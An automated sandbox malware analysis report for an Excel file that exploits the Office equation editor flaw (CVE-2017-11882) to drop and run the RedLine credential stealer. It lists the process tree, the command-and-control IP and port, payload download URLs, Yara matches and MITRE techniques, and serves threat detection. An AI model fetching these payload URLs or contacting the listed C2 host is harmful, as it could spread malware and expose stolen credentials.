Automated Malware Analysis Report for POAT2076452.xlsx ...

ID: 576509 Sample Name: POAT2076452.xlsx Cookbook: defaultwindowsofficecookbook.jbs Time: 15:29:06 Date: 22/02/2022 Version: 34.0.0 Boulder Opal


Table of Contents

Windows Analysis Report POAT2076452.xlsx
  Overview
    General Information
    Detection
    Signatures
    Classification
  Process Tree
  Malware Configuration
    Threatname: RedLine
  Yara Signatures
    PCAP (Network Traffic)
    Memory Dumps
    Unpacked PEs
  Sigma Signatures
    Exploits
    System Summary
  Joe Sandbox Signatures
    AV Detection
    Exploits
    Networking
    System Summary
    Data Obfuscation
    Boot Survival
    Hooking and other Techniques for Hiding and Protection
    Malware Analysis System Evasion
    HIPS / PFW / Operating System Protection Evasion
    Stealing of Sensitive Information
    Remote Access Functionality
  Mitre Att&ck Matrix
  Behavior Graph
  Screenshots
    Thumbnails
  Antivirus, Machine Learning and Genetic Malware Detection
    Initial Sample
    Dropped Files
    Unpacked PE Files
    Domains
    URLs
  Domains and IPs
    Contacted Domains
    Contacted URLs
    URLs from Memory and Binaries
    World Map of Contacted IPs
  Public IPs
  General Information
  Warnings
  Simulations
    Behavior and APIs
  Joe Sandbox View / Context
    IPs
    Domains
    ASNs
    JA3 Fingerprints
    Dropped Files
  Created / dropped Files
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34F90E45.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE9EF17.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51123782.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\540F5A54.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597D09DF.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D634E2C.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5A50888.emf
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF292561.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEDCE7D6.jpeg
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC9D9B.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E382C2E0.jpeg
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0748BEE.png
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EE9.png
    C:\Users\user\AppData\Local\Temp\tmp3E26.tmp
    C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp
    C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp
    C:\Users\user\AppData\Local\Temp\tmp533A.tmp

Copyright Joe Security LLC 2022 Page 2 of 65


    C:\Users\user\AppData\Local\Temp\tmp6222.tmp
    C:\Users\user\AppData\Local\Temp\tmp62EE.tmp
    C:\Users\user\AppData\Local\Temp\tmp6417.tmp
    C:\Users\user\AppData\Local\Temp\tmp64E3.tmp
    C:\Users\user\AppData\Local\Temp\tmp66A8.tmp
    C:\Users\user\AppData\Local\Temp\tmp67A3.tmp
    C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp
    C:\Users\user\AppData\Local\Temp\tmp6C85.tmp
    C:\Users\user\AppData\Local\Temp\tmp7108.tmp
    C:\Users\user\AppData\Local\Temp\tmp71C5.tmp
    C:\Users\user\AppData\Local\Temp\tmp72BF.tmp
    C:\Users\user\AppData\Local\Temp\tmp738B.tmp
    C:\Users\user\AppData\Local\Temp\tmp7486.tmp
    C:\Users\user\AppData\Local\Temp\tmp7551.tmp
    C:\Users\user\AppData\Local\Temp\tmp764C.tmp
    C:\Users\user\AppData\Local\Temp\tmp7718.tmp
    C:\Users\user\AppData\Local\Temp\tmp7841.tmp
    C:\Users\user\AppData\Local\Temp\tmp790D.tmp
    C:\Users\user\AppData\Local\Temp\tmp79D9.tmp
    C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp
    C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp
    C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp
    C:\Users\user\AppData\Local\Temp\~DF179744FD61C7CF51.TMP
    C:\Users\user\AppData\Local\Temp\~DF26FE9B5EC11612F4.TMP
    C:\Users\user\AppData\Local\Temp\~DFAB0D2DA66A547388.TMP
    C:\Users\user\AppData\Local\Temp\~DFEA839BB433B75553.TMP
    C:\Users\user\Desktop\~$POAT2076452.xlsx
    C:\Users\Public\vbc.exe
  Static File Info
    General
    File Icon
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    DNS Queries
    DNS Answers
    HTTP Request Dependency Graph
    HTTP Packets
    HTTPS Proxied Packets
  Statistics
    Behavior
  System Behavior
    Analysis Process: EXCEL.EXE PID: 2580, Parent PID: 596
      General
      File Activities
      Registry Activities
        Key Created
        Key Value Created
    Analysis Process: EQNEDT32.EXE PID: 2664, Parent PID: 596
      General
      File Activities
      Registry Activities
        Key Created
    Analysis Process: vbc.exe PID: 1828, Parent PID: 2664
      General
      File Activities
        File Read
      Registry Activities
        Key Created
        Key Value Created
    Analysis Process: vbc.exe PID: 2844, Parent PID: 1828
      General
      File Activities
        File Created
        File Deleted
        File Written
        File Read
  Disassembly


Windows Analysis Report POAT2076452.xlsx

Overview

General Information

Sample Name:

POAT2076452.xlsx

Analysis ID: 576509

MD5: e9ffc84abf7ed6f…

SHA1: d636a41a99a022…

SHA256: 03d548395841b2…

Tags: Formbook VelvetSweatshop xlsx

Infos:

Detection

RedLine

Score: 100

Range: 0 - 100

Whitelisted: false

Confidence: 100%

Signatures

Yara detected RedLine Stealer

Found malware configuration

Sigma detected: EQNEDT32.EXE c…

Multi AV Scanner detection for subm…

Malicious sample detected (through…

Sigma detected: Droppers Exploiting…

Sigma detected: File Dropped By EQ…

Antivirus detection for URL or domain

Tries to steal Crypto Currency Walle…

Uses known network protocols on n…

Office equation editor starts process…

.NET source code contains potentia…

Injects a PE file into a foreign proce…

Sigma detected: Suspicious Program…

Sigma detected: Execution from Su…

Queries sensitive video device infor…

Office equation editor drops PE file

Queries sensitive disk information (v…

Machine Learning detection for drop…

Searches for Windows Mail specific…

Drops PE files to the user root direc…

Found many strings related to Crypt…

Tries to harvest and steal browser in…

Queries the volume information (nam…

Yara signature match

May sleep (evasive loops) to hinder…

Checks if Antivirus/Antispyware/Fire…

Detected potential crypto function

Stores large binary data to the regis…

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in co…

Potential document exploit detected…

HTTP GET or POST without a user …

IP address seen in connection with …

Downloads executable code via HTT…

Uses insecure TLS / SSL version fo…

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

[Classification chart: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner, each rated on a clean / suspicious / malicious scale]

Process Tree

System is w7x64

EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2664 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

    vbc.exe (PID: 1828 cmdline: "C:\Users\Public\vbc.exe" MD5: 980EC4304344F277D722024ADE08CD01)

        vbc.exe (PID: 2844 cmdline: C:\Users\Public\vbc.exe MD5: 980EC4304344F277D722024ADE08CD01)

cleanup

Malware Configuration

Threatname: RedLine

{
  "C2 url": [
    "179.43.175.99:21900"
  ],
  "Bot Id": "cheat"
}

Yara Signatures

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |


Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000004.00000002.501429999.0000000003319000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
5.0.vbc.exe.400000.8.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
5.0.vbc.exe.400000.8.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
5.0.vbc.exe.400000.8.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | (matched strings listed below)
    0x1048a:$u7: RunPE
    0x13b41:$u8: DownloadAndEx
    0x9130:$pat14: , CommandLine:
    0x13079:$v2_1: ListOfProcesses
    0x1068b:$v2_2: get_ScanVPN
    0x1072e:$v2_2: get_ScanFTP
    0x1141e:$v2_2: get_ScanDiscord
    0x1240c:$v2_2: get_ScanSteam
    0x12428:$v2_2: get_ScanTelegram
    0x124ce:$v2_2: get_ScanScreen
    0x13216:$v2_2: get_ScanChromeBrowsersPaths
    0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
    0x13509:$v2_2: get_ScanBrowsers
    0x135ca:$v2_2: get_ScannedWallets
    0x135f0:$v2_2: get_ScanWallets
    0x13610:$v2_3: GetArguments
    0x11cd9:$v2_4: VerifyUpdate
    0x165ea:$v2_4: VerifyUpdate
    0x139ca:$v2_5: VerifyScanRequest
    0x130c6:$v2_6: GetUpdates
    0x165cb:$v2_6: GetUpdates
5.0.vbc.exe.400000.12.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
5.0.vbc.exe.400000.12.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Sigma Signatures

Exploits

System Summary

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: Execution from Suspicious Folder

Joe Sandbox Signatures


AV Detection

Exploits

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Found malware configuration

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Machine Learning detection for dropped file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Uses known network protocols on non-standard ports

Malicious sample detected (through community Yara rule)

Office equation editor drops PE file

.NET source code contains potential unpacker

Drops PE files to the user root directory

Uses known network protocols on non-standard ports

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Injects a PE file into a foreign processes

Yara detected RedLine Stealer

Tries to steal Crypto Currency Wallets

Searches for Windows Mail specific files

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Yara detected RedLine Stealer


Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services

Execution: 2 2 1 Windows Management Instrumentation; 1 3 Exploitation for Client Execution; At (Linux); At (Windows); Cron; Launchd; Scheduled Task

Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items

Privilege Escalation: 1 1 1 Process Injection; 1 Extra Window Memory Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items

Defense Evasion: 1 1 1 Masquerading; 1 Modify Registry; 1 Disable or Modify Tools; 2 3 1 Virtualization/Sandbox Evasion; 1 1 1 Process Injection; 1 Software Packing; 1 Extra Window Memory Injection

Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync

Discovery: 1 Query Registry; 2 3 Security Software Discovery; 1 Process Discovery; 2 3 1 Virtualization/Sandbox Evasion; 1 Remote System Discovery; 1 File and Directory Discovery; 1 1 4 System Information Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management

Collection: 1 Email Collection; 1 Archive Collected Data; 3 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol

Command and Control: 1 1 Encrypted Channel; 1 1 Non-Standard Port; 1 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 2 4 Application Layer Protocol; Multiband Communication; Commonly Used Port

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points

Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact

(Numbers before a technique name are the signature counts shown in the matrix cell.)

Behavior Graph


Behavior GraphID: 576509

Sample: POAT2076452.xlsx

Startdate: 22/02/2022

Architecture: WINDOWS

Score: 100

Found malware configuration

Malicious sample detected (through community Yara rule)

Antivirus detection for URL or domain

14 other signatures

EQNEDT32.EXE

12

started

EXCEL.EXE

33 29

started

103.171.0.134, 49165, 80

AARNET-AS-AP Australian Academic and Research Network AARNe

unknown

C:\Users\user\AppData\Local\...\.win32[1].exe, PE32

dropped

C:\Users\Public\vbc.exe, PE32

dropped

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

vbc.exe

12

started

C:\Users\user\Desktop\~$POAT2076452.xlsx, data

dropped

olypath.com

178.18.193.160, 49167, 80

VARGONENTR

Turkey

cdn.discordapp.com

162.159.130.233, 443, 49166

CLOUDFLARENETUS

United States

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Injects a PE file into a foreign processes

vbc.exe

28

started

179.43.175.99, 21900, 49168, 49170

PLI-ASCH

Panama

api.ip.sb

Searches for Windows Mail specific files

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Legend:

Process

Signature

Created File

DNS/IP Info

Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic

Delphi

Java

.Net C# or VB.NET

C, C++ or other language

Is malicious

Internet


Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
POAT2076452.xlsx | 35% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882 |

Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe | 7% | ReversingLabs | |
C:\Users\Public\vbc.exe | 7% | ReversingLabs | |

Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
5.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1144480 | |
5.0.vbc.exe.400000.16.unpack | 100% | Avira | HEUR/AGEN.1144480 | |
5.0.vbc.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1144480 | |
5.0.vbc.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1144480 | |
5.0.vbc.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1144480 | |
5.0.vbc.exe.400000.14.unpack | 100% | Avira | HEUR/AGEN.1144480 | |

Domains

Source | Detection | Scanner | Label | Link | Download
⊘ No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
ns.adobe.c/s | 0% | Avira URL Cloud | safe |
ocsp.entrust.net03 | 0% | URL Reputation | safe |
tempuri.org/Endpoint/EnvironmentSettings | 0% | URL Reputation | safe |
179.43.175.99:21900x0 | 0% | Avira URL Cloud | safe |
https://api.ip.sb/geoip | 0% | URL Reputation | safe |
crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
tempuri.org/ | 0% | URL Reputation | safe |
www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
103.171.0.134/_spaceX2__/.win32.exe | 100% | Avira URL Cloud | malware |
tempuri.org/Endpoint/VerifyUpdateResponse | 0% | URL Reputation | safe |
tempuri.org/Endpoint/CheckConnectprH= | 100% | Avira URL Cloud | phishing |
tempuri.org/Endpoint/SetEnvironment | 0% | URL Reputation | safe |
tempuri.org/Endpoint/SetEnvironmentResponse | 0% | URL Reputation | safe |
tempuri.org/Endpoint/GetUpdates | 0% | URL Reputation | safe |
https://api.ipify.orgcookies//settinString.Removeg | 0% | URL Reputation | safe |
179.43.175.99:21900 | 0% | Avira URL Cloud | safe |
tempuri.org/Endpoint/VerifyUpdate | 0% | URL Reputation | safe |
tempuri.org/Endpoint/SetEnvironmenteMH= | 100% | Avira URL Cloud | phishing |
ocsp.entrust.net0D | 0% | URL Reputation | safe |
tempuri.org/Endpoint/CheckConnectResponse | 0% | URL Reputation | safe |
schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe |
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe |
https://api.ip.sbP | 0% | Avira URL Cloud | safe |
crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe |
tempuri.org/Endpoint/GetUpdatesResponse | 0% | URL Reputation | safe |
tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | URL Reputation | safe |
olypath.com/RLBIl.exe | 100% | Avira URL Cloud | malware |
ns.adobe. | 0% | URL Reputation | safe |
https://api.ipify. | 0% | Avira URL Cloud | safe |
olypath.comP | 0% | Avira URL Cloud | safe |
tempuri.org/h | 100% | Avira URL Cloud | phishing |
https://api.ipify.orgcoo | 0% | Avira URL Cloud | safe |
179.43.175.99:21900/ | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn.discordapp.com | 162.159.130.233 | true | false | | high
olypath.com | 178.18.193.160 | true | false | | unknown
api.ip.sb | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
103.171.0.134/_spaceX2__/.win32.exe | true | Avira URL Cloud: malware | unknown
https://cdn.discordapp.com/attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme | false | | high
olypath.com/RLBIl.exe | true | Avira URL Cloud: malware | unknown
179.43.175.99:21900/ | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name Source Malicious Antivirus Detection Reputation

https://duckduckgo.com/chrome_newtab vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

ns.adobe.c/s vbc.exe, 00000005.00000002.549398134.000000000500D000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe unknown

https://duckduckgo.com/ac/?q= vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

ocsp.entrust.net03 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false URL Reputation: safe unknown

tempuri.org/Endpoint/EnvironmentSettings vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

179.43.175.99:21900x0 vbc.exe, 00000005.00000002.548189669.0000000002705000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe low

https://api.ip.sb/geoip vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

schemas.xmlsoap.org/soap/envelope/ vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp

false high

crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false URL Reputation: safe unknown

tempuri.org/ vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

www.diginotar.nl/cps/pkioverheid0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false URL Reputation: safe unknown

tempuri.org/Endpoint/VerifyUpdateResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

tempuri.org/Endpoint/CheckConnectprH= vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

true Avira URL Cloud: phishing unknown

tempuri.org/Endpoint/SetEnvironment vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

tempuri.org/Endpoint/SetEnvironmentResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

tempuri.org/Endpoint/GetUpdates vbc.exe, 00000005.00000002.548189669.0000000002705000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547547882.0000000002381000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

https://api.ipify.orgcookies//settinString.Removeg vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp

true URL Reputation: safe unknown

schemas.xmlsoap.org/ws/2004/08/addressing/fault vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

179.43.175.99:21900 vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe unknown

tempuri.org/Endpoint/VerifyUpdate vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

tempuri.org/Endpoint/SetEnvironmenteMH= vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

true Avira URL Cloud: phishing unknown

ocsp.entrust.net0D vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false URL Reputation: safe unknown

schemas.xmlsoap.org/ws/2005/05/identity/claims/name

vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

https://ipinfo.io/ip%appdata% vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp

false high

crl.entrust.net/server1.crl0 vbc.exe, 00000004.00000002.498357684.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547399918.00000000008B2000.00000004.00000020.00020000.00000000.sdmp

false high

schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous

vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

tempuri.org/Endpoint/CheckConnectResponse vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown

schemas.datacontract.org/2004/07/ vbc.exe, 00000005.00000002.547940264.0000000002557000.00000004.00000800.00020000.00000000.sdmp

false URL Reputation: safe unknown


https://api.ip.sb/geoip%USERPEnvironmentROFILE% vbc.exe, vbc.exe, 00000005.00000000.496802166.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.546999883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.497707584.0000000000402000.00000040.00000400.00020000.00000000.sdmp

false URL Reputation: safe unknown

https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=

vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search

vbc.exe, 00000005.00000002.547682339.000000000240F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548320280.000000000273A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.547781188.000000000247D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548682456.0000000002814000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.548467689.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, tmp7551.tmp.5.dr, tmp71C5.tmp.5.dr, tmp764C.tmp.5.dr, tmp7718.tmp.5.dr, tmp7AA5.tmp.5.dr, tmp7841.tmp.5.dr, tmp7486.tmp.5.dr, tmp738B.tmp.5.dr, tmp790D.tmp.5.dr, tmp7108.tmp.5.dr, tmp79D9.tmp.5.dr, tmp72BF.tmp.5.dr

false high

https://cdn.discordapp.com vbc.exe, 00000004.00000002.498497574.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

https://api.ip.sbP vbc.exe, 00000005.00000002.547529132.0000000002357000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe unknown

https://www.google.com/favicon.ico tmp72BF.tmp.5.dr false high

